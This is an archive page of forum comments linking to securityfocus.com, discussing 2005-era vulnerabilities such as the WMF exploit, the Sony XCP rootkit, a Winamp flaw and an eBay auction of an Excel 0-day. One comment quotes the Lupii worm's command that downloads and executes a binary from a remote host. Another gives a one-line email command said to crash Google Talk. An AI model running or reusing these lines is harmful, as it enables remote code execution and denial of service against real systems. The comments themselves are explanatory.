Domain: securityfocus.com
Stories and comments across the archive that link to securityfocus.com.
Comments · 2,651
-
Re:MS Anti-Virus
Again?
Winamp is the Internet Explorer of mp3 players. It's had a massive amount of vulnerabilities. This is the third playlist vulnerability alone: see the other two. Are they going to do a code audit, or will we see the same kind of vulnerabilities again and again?
I moved to a player with a good media library years ago. Even if that's not for you, consider something like Foobar2000.
-
SecurityFocus Interview
SecurityFocus just posted an excellent interview with Fyodor about the 4.00 release. Topics include speed benchmarks, version detection improvement details, the upcoming new OS detection system, and reactions to Nessus going proprietary.
-
Re:Oh, that'll stop 'em
It's not like they're idiots either. They obviously are aware of what the Internet and Wikipedia are. And this link:
http://en.wikipedia.org/wiki/IP_address
goes to this one:
http://www.securityfocus.com/infocus/1674 -
Re:Really a problem?
Especially as there is apparently a workaround:
http://www.securityfocus.com/archive/1/423029
The workaround is trivial; using mod_rewrite, which is compiled into Oracle's Apache distribution, it is possible to stop the attack. The workaround checks a user's web request for the presence of a right-facing bracket, ')'.
Add the following four lines to your http.conf file, then stop and restart the web server:
RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack
-
Samba 4
There has been info about Samba 4 for some time. Andrew Bartlett wrote a year ago an interesting thesis about Samba 4 and Active Directory (PDF).
But the release of this TP is good news; I hope that the use of Microsoft's Active Directory as an authentication service for Linux systems is coming to an end. All we need now is a nice GUI. -
Re:Um...
1. There is no way to formally prove in general that a program is logically correct . . . 2. A programming environment is either primitive-recursive (and thus very simple and doesn't offer too much for programming) or it is Turing complete and thus capable (in theory) to host every conceivable program . . . 3. There is always the problem of covert channels . . .
Let me guess: You're a CS major, or you are repeating what you heard from a CS major?
We're not anywhere close to approaching the theoretical limits of information security. All you need to do is to subscribe to any number of security announcement mailing lists (e.g. BugTraq or debian-security-announce) and you will see that the number of buffer overflows, arbitrary SQL injection vulnerabilities, and /tmp races -- problems for which solutions have been well-known for years if not decades -- is simply appalling. Heck, just look at the anti-virus industry (and more recently, the anti-spyware industry), something that would not exist if it weren't for the abysmally poor design of today's computing environments.
At least until we get these problems under control, I'm not interested in hearing sermons about Turing completeness, covert channels, and the theoretical futility of ideal information security.
-
Re:Weak.
I won't get into the political side of this thread, but I will say this. Your views of Diebold are incorrect. Do I believe they have sloppy security and don't care to fix it? Absolutely. Do I believe they chose Windows XP and are using it as a flimsy excuse to not provide the source code of their machines to the state of North Carolina? You bet. But don't for a minute think that Diebold knows anything about security.
You say that Diebold's ATM machines haven't been broken, and not for lack of being a juicy target. You're right, an ATM machine might be a juicy target. But you would have to know way more than the workings of Windows XP in order to extract cash from them. But the main reason you haven't seen them broken into? Because they're not on the Internet. The banking ATM network is a completely separate network, or so I have been told by a friend who is the IT manager at a local bank. There's the Internet, there's the bank's internal network, and then there's the ATM network (not to be confused with the ATM protocol).
But just to show how secure Diebold's ATM machines are, take a look at this article: Nachi worm infected Diebold ATMs. These guys *ARE* a bunch of inept oafs who have no business in the banking or voting industries. -
Re:It makes you wonder...
Typically it's unusual to see ``just a crash.'' Most programmes written in C and C++ crash due to buffer overflows, which frequently lead to running unsigned code. As a general rule, if a C or C++ code crashes, it is a fairly likely possibility to be able to run arbitrary code. Just because nobody's done it yet doesn't mean that it's not possible.
If you actually code for a living you should stop right now. (living or coding, either way works for me).
The bugs demonstrated here are not buffer overflows. They are the other kind of common C/C++ bug, namely an invalid (in this case NULL) pointer dereference. Null pointer dereferencing bugs are rarely exploitable.
Sorry, but they're not null pointer dereferences, they're both integer errors which cause wacky but non-exploitable behaviour. For those who speak some assembly (clearly nobody in this subthread) the author's analysis can be found here:
http://www.securityfocus.com/archive/1/421257/30/30/threaded -
SecurityFocus article
There's another debunking over at SecurityFocus
-
Re:Do you think it would help?
Not anyone like, say, the US Navy, for example:
http://wired-vig.wired.com/news/technology/0,1282,13758,00.html
Or air traffic controllers:
http://www.techworld.com/opsys/news/index.cfm?NewsID=2275
Or nuclear power plants:
http://www.securityfocus.com/news/6767
Regardless of how you rate the intelligence of the parties involved in these little incidents I think you'll find that Windows is very often deployed in mission critical areas.
And yes, often with catastrophic consequences. >) -
Re:That's It??
-
Re:Telnet is fun
You don't, maybe somebody else does.
Maybe somebody is going to head over to http://www.securityfocus.com/vulnerabilities and notice that there are forty or fifty vulnerabilities listed for the software that I was able to identify versions of. Maybe somebody will be kind enough to notify the people about their insecure box. But since there isn't any contact info directly on the site... -
More details
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution
http://www.securityfocus.com/bid/16074
http://www.microsoft.com/technet/security/advisory/912840.mspx
http://www.symantec.com/avcenter/venc/data/pf/pwsteal.bankash.g.html -
more serious
And not only does the exploit work with .WMF (Windows MetaFile), but if the attacker renames it to, say, .JPG, Windows will detect this as really being a .WMF, and STILL execute it. Pretty serious stuff. See this bugtraq link for details. -
Re:Another /. dupe
Since last time it has been reported that this can also be exploited by renaming infected wmf files to other image formats like jpg, gif and tif:
http://www.securityfocus.com/archive/1/420378/30/0/threaded -
Re:Does it affect LUAs?
From the security focus posting (http://www.securityfocus.com/bid/16074/discuss):
"The issue may be exploited remotely or by a local attacker. Any code execution that occurs will be with SYSTEM privileges due to the nature of the affected engine."
Under this circumstance I would expect that having a limited user account will not offer you any degree of protection, as the malware is running at system level.
F_T -
Re:Breaks thumbnails and Windows Picture Viewer
I'd read this before you take your chances, because it appears as though the exploit will work when the .wmf is disguised as a .jpg (or other extensions) -
Re:Not Previously Unknown
It's completely new. The WMF patch released before does not protect against this exploit.
http://www.securityfocus.com/bid/16074 -
Re:Not Previously Unknown
From November 8th: http://www.securityfocus.com/bid/15352
New metasploit plugin = new exploit
New metasploit plugin != new vulnerability -
I'm pleased...
I'm pleased that they're using HDCP as it's been cracked already.
http://www.securityfocus.com/news/236
It's going to be really interesting to see how successful the new consortium is in forcing US copyright legislation on the rest of the world.
Or, perhaps, hardware not made in the US, or for US export only, will have versions of the interface that don't include HDCP. Gee. I wonder how long it will take for US consumers to buy their hardware from outside the US instead. -
More information and a few questions:
First, in the interest of stimulating more informed discussion, here is some more information concerning the auction:
- The actual article on SecurityFocus (not the abbreviated discussion article referenced in TFS).
- The full text of the auction, courtesy of the good folks at the OSVDB blog.
- The screenie of the actual eBay auction, again courtesy of OSVDB.
From the auction text:
The lot: One 0-day Microsoft Excel Vulnerability
Up for sale is one (1) brand new vulnerability in the Microsoft Excel application. The vulnerability was discovered on December 6th 2005, all the details were submitted to Microsoft, and the reply was received indicating that they may start working on it. It can be assumed that no patch addressing this vulnerability will be available within the next few months. So, since I was unable to find any use for this by-product of Microsoft developers, it is now available for you at the low starting price of $0.01 (a fair value estimation for any Microsoft product).
A percentage of this sale will be contributed to various open-source projects.
Second, two questions:
- As the seller did in fact report this vulnerability to Microsoft first, would his subsequent attempt to call attention to the vulnerability by posting it for auction on eBay be considered 'irresponsible'?
- Exactly which eBay rule did this auction break?
Discuss.
-
Re:More of a community attitude issue.
As opposed to say, perl, right?
While perl security has gotten better, it is still a problem. perl is still widely exploited, formmail.pl is one of the more infamous ones. lusers just download whatever script they find off the web and install it, and get quickly compromised.
Are the majority of perl users well versed in perl security? I doubt it.
What, you going to recommend people use C instead of PHP then? python? Even java has issues.
It's very fashionable, hip and trendy to bash PHP on /., while ignoring the fact most other languages really aren't any better. -
How long did apple wait?
Is apple normally slow with updates?
The SUDO flaw was discovered in June 2005 and a patch was released subsequently after...
So 6 months later, Apple decides to update their OS? WTF!?!?!
http://www.securityfocus.com/archive/1/402741 -
Google's recent security problems
Seems that more and more security researchers are turning their attention to Google these days. There has been a spate of recent bugs published to the usual mailing lists in past weeks.
Title: Google Talk Denial of Service - BenjiBug
Google Talk's automatic update mechanism (which can't be turned off) checks to see if the downloaded file matches a signature, but it doesn't check the size of the file. So it can be forced to compute a hash of a 1 gig file, crashing the machine.
Killer Empty Sender Message
echo kill | nail -s Kill -r "" victim (at) gmail (dot) com [email concealed]
crashes Google Talk
Google Talk cleartext proxy credentials vulnerability
Google Talk stores the GMail login details securely, but not the proxy authentication credentials
Not to mention the GMail bug discussed on /. recently
Ah, the perpetual beta.. -
Re:High-level systems languages
-
No
Check out their full statement (from a Security Focus article):
We are aware that a computer virus is circulating that may affect computers with XCP content protection software. The XCP software is included on a limited number of SONY BMG content protected titles. This potential problem has no effect on the use of these discs in conventional, non-computer-based, CD and DVD players.
In response to these events, SONY BMG has swiftly provided a patch to all major anti-virus companies and to the general public that guards against precisely the type of virus now said to exist. The patch fixes the possible software problem, and still allows CDs to be played on personal computers. It can be downloaded at http://cp.sonybmg.com/xcp/. Starting today, we will also be adding this link to the SONY BMG label and corporate sites. We deeply regret any possible inconvenience this may cause.
We stand by content protection technology as an important tool to protect our intellectual property rights and those of our artists. Nonetheless, as a precautionary measure, SONY BMG is temporarily suspending the manufacture of CDs containing XCP technology. We also intend to re-examine all aspects of our content protection initiative to be sure that it continues to meet our goals of security and ease of consumer use. More information about our content protection initiative can also be found at: http://cp.sonybmg.com/xcp.
They're spinning this with all their might. Remember that the patch they so proudly trumpet (look how serious we are about protecting our customers!) doesn't remove the rootkit - it merely disables the cloaking feature. Also note that while they say they are suspending manufacture of these CDs, there is no mention of any effort to remove already manufactured copies from store shelves or the distribution network. Considering that CDs are stamped in large production runs and then kept in inventory, they really haven't committed to anything except to "re-examine all aspects of our content protection initiative to be sure that it continues to meet our goals of security and ease of consumer use." (and note how their goals do not include consumer privacy or control over their own electronic devices).
No, I don't think we forgive them for this for a long time yet. -
Re:Remarkably Useless page.
Step one: go to securityfocus and update all of the applications listed on your system.
Symptoms
Presence of the following file:
* /tmp/lupii
One of the following ports are listening:
* UDP 7111
* UDP 7222
So running su -c"netstat --listening --extend --program" tells you if it's even running, by listing what's listening on any port, such as UDP 7111 or 7222.
Then it would be easy to:
su -c"kill -9 pid-of-lupii" su -c"rm /tmp/lupii" su -c"touch /tmp/lupii"
The worm apparently does this:
echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
So unless your server has a vulnerability that allows privilege escalation from nobody, it's stuck in tmp directories or possibly in your html directories. -
Re:Short of detail
This list is affected: http://www.securityfocus.com/bid/14088/info
-
Other links
-
Re:Not $8 for Consumers
Put very simply, if Sony wants to charge $10 then they're going to have to bend over backwards on this.
A new release DVD cost, lets assume, $20.
$20 New DVD
$02 But I don't get packaging. Minus $2.
$01 I don't get fixed media. I have to store this myself. Minus $1
$05 DRMed to hell! I can't make backups! Minus $5.
$05 I have to download it and pay for the bandwidth. Minus $5.
----
$8
Well there's the $8. Now if they don't screw up ANYTHING else that's fine and I'd probably buy it... but only for a new DVD. No way would I shell out $8 for a DRM copy of 2001 or something. God help them if they install rootkits.
On a related note - I assume everyone saw the rather clever exploit for WoW using the Sony rootkit? If not, security focus has it. -
Re:AJAX on the desktop
Yeah, and do you also know who is controlling AJAX?